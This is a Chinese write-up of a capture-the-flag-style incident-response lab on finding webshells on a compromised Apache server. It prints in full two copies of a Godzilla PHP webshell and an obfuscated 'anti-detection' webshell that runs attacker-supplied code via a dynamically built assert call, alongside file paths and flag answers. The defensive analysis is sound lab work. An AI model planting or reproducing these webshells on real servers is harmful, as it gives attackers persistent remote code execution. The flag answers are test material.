第一章-应急响应-webshell查杀-玄机靶场
    
  
          
    
      
        
          字数统计: 
        742字
      
    
    
        |  
      
        
        阅读时长:
        3分
      
    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
          
      
      
      
      
    
    
      
          
        一个webshell查杀的简单靶场J记录
题目问题
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}
问题一-黑客webshell里面的flag
把代码拖入火绒中发现三个shell
1 2 3 4
   | 病毒ID:3266DAD22A635EF7 病毒路径:D:\wsl\apache2\html\include\gz.php 操作类型:修改  操作结果:已处理,删除文件
   | 
 
1 2 3 4 5 6 7
   | 病毒路径:D:\wsl\apache2\html\shell.php 操作类型:修改  操作结果:已处理,删除文件
  病毒路径:D:\wsl\apache2\html\include\Db\.Mysqli.php 操作类型:修改  操作结果:已处理,删除文件
   | 
 
在gz.php中找到flag   :027ccd04-5065-48b6-a32d-77c704a5e26d 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
   |  ./html/include/gz.php root@ip-10-0-10-2:/var/www# cat ./html/include/gz.php <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){     for($i=0;$i<strlen($D);$i++) {         $c = $K[$i+1&15];         $D[$i] = $D[$i]^$c;     }     return $D; } //027ccd04-5065-48b6-a32d-77c704a5e26d $payloadName='payload'; $key='3c6e0b8a9c15224a'; $data=file_get_contents("php://input"); if ($data!==false){     $data=encode($data,$key);     if (isset($_SESSION[$payloadName])){         $payload=encode($_SESSION[$payloadName],$key);         if (strpos($payload,"getBasicsInfo")===false){             $payload=encode($payload,$key);         }                 eval($payload);         echo encode(@run($data),$key);     }else{         if (strpos($data,"getBasicsInfo")!==false){             $_SESSION[$payloadName]=encode($data,$key);         }     } } /var/www/html/include/gz.php
  /var/www/html/wap/index.php
 
  | 
 
问题二-黑客使用的什么工具的shell github地址的md5 flag{md5}
1 2 3 4 5
   | $payloadName='payload'; $key='3c6e0b8a9c15224a'; $data=file_get_contents("php://input"); if ($data!==false){     $data=encode($data,$key);
   | 
 
利用代码片段在搜索引擎中搜索,发现是哥斯拉

项目地址:GitHub - BeichenDream/Godzilla: 哥斯拉
问题3.黑客隐藏shell的完整路径的md5
为.Mysqli.php 文件
路径:html/include/Db/.Mysqli.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
   | root@ip-10-0-10-2:/var/www# cat html/include/Db/.Mysqli.php <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){     for($i=0;$i<strlen($D);$i++) {         $c = $K[$i+1&15];         $D[$i] = $D[$i]^$c;     }     return $D; } $payloadName='payload'; $key='3c6e0b8a9c15224a'; $data=file_get_contents("php://input"); if ($data!==false){     $data=encode($data,$key);     if (isset($_SESSION[$payloadName])){         $payload=encode($_SESSION[$payloadName],$key);         if (strpos($payload,"getBasicsInfo")===false){             $payload=encode($payload,$key);         }                 eval($payload);         echo encode(@run($data),$key);     }else{         if (strpos($data,"getBasicsInfo")!==false){             $_SESSION[$payloadName]=encode($data,$key);         }     } }
   | 
 
问题4 .黑客免杀马完整路径
免杀马为top.php(因为没有明显的eval assert system那些函数)
内容为:
1 2 3 4 5 6 7 8 9 10 11 12 13
   | <?php
  $key = "password";
  //ERsDHgEUC1hI $fun = base64_decode($_GET['func']); for($i=0;$i<strlen($fun);$i++){     $fun[$i] = $fun[$i]^$key[$i+1&7]; } $a = "a"; $s = "s"; $c=$a.$s.$_GET["func2"]; $c($fun);
   | 
 
路径为:/var/www/html/wap/top.php
md5后的值为 eeff2eabfd9b7a6d26fc1a53d3f7d1de